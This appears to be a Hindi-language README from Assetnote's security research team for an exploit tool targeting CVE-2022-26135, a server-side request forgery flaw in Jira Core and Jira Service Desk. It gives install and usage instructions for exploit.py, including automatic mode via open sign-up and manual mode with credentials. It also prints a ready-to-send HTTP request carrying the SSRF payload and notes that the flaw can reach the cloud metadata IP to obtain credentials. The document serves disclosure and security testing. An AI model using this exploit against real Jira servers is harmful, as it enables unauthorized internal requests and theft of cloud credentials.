
Jira Mobile Rest Plugin SSRF (CVE-2022-26135) के लिए एक्सप्लॉइट कोड
Assetnote स्वचालित रूप से आपकी बाहरी संपत्तियों का मानचित्रण करता है और गंभीर सुरक्षा उल्लंघनों को रोकने में मदद करने के लिए उनमें बदलाव और सुरक्षा मुद्दों की निगरानी करता है।
यह शोध Assetnote की सुरक्षा अनुसंधान टीम द्वारा किया गया था।
आप हमारे उत्पाद और हमारी टीम के बारे में https://assetnote.io पर अधिक पढ़ सकते हैं।
इस भेद्यता की खोज के लिए उठाए गए कदमों का विवरण देने वाला ब्लॉग पोस्ट यहाँ पाया जा सकता है।
Jira Core और Jira Service Desk प्रमाणीकरण के बाद सर्वर-साइड रिक्वेस्ट फोर्जरी की चपेट में हैं। कुछ मामलों में, बिना ज्ञात क्रेडेंशियल्स के इस सर्वर-साइड रिक्वेस्ट फोर्जरी दोष का शोषण करने के लिए Jira Core या Jira Service Desk में खुले साइन-अप का लाभ उठाना संभव है।
SSRF भेद्यता हमलावरों को किसी भी HTTP विधि, हेडर और बॉडी का उपयोग करके मनमाने URL पर HTTP अनुरोध भेजने की अनुमति देती है। जब Jira को क्लाउड वातावरण में तैनात किया जाता है, तो एक हमलावर मेटाडेटा IP पते के माध्यम से क्लाउड क्रेडेंशियल या अन्य संवेदनशील जानकारी प्राप्त करने के लिए इस शोषण श्रृंखला का लाभ उठा सकता है।
Atlassian की सलाह के अनुसार, क्या आप प्रभावित सॉफ्टवेयर संस्करण चला रहे हैं, यह पुष्टि करने के लिए कृपया निम्नलिखित ज्ञानकोष लेख देखें: https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html
pip3 install -r requirements.txt
और फिर आप निम्न का उपयोग करके एक्सप्लॉइट का उपयोग कर सकते हैं:
python3 exploit.py
मदद:
usage: exploit.py [-h] --target TARGET --ssrf SSRF --mode MODE [--software SOFTWARE] [--username USERNAME] [--email EMAIL] [--password PASSWORD]
optional arguments:
-h, --help show this help message and exit
--target TARGET i.e. http://re.local:8090
--ssrf SSRF i.e. example.com (no protocol pls)
--mode MODE i.e. manual or automatic - manual mode you need to provide user auth info
--software SOFTWARE i.e. jira or jsd - only needed for manual mode
--username USERNAME i.e. admin - only needed for manual jira mode
--email EMAIL i.e. [email protected] - only needed for manual jira service desk mode
--password PASSWORD i.e. testing123 - only needed for manual mode
यदि आपके पास पहले से Jira / Jira Service Desk के लिए क्रेडेंशियल हैं, तो --mode को manual पर सेट करें और --software आर्गुमेंट को jira या jsd में से किसी एक पर सेट करें।
Jira इंस्टेंस में प्रमाणित होने के बाद, इस समस्या को पुन: उत्पन्न करने के लिए निम्नलिखित HTTP अनुरोध का उपयोग किया जा सकता है:
POST /rest/nativemobile/1.0/batch HTTP/2
Host: issues.example.com
Cookie: JSESSIONID=44C6A24A15A1128CE78586A0FA1B1662; seraph.rememberme.cookie=818752%3Acc12c66e2f048b9d50eff8548800262587b3e9b1; atlassian.xsrf.token=AES2-GIY1-7JLS-HNZJ_db57d0893ec4d2e2f81c51c1a8984bde993b7445_lin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Origin: https://issues.example.com
Referer: https://issues.example.com/plugins/servlet/desk
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 63
{"requests":[{"method":"GET","location":"@example.com"}]}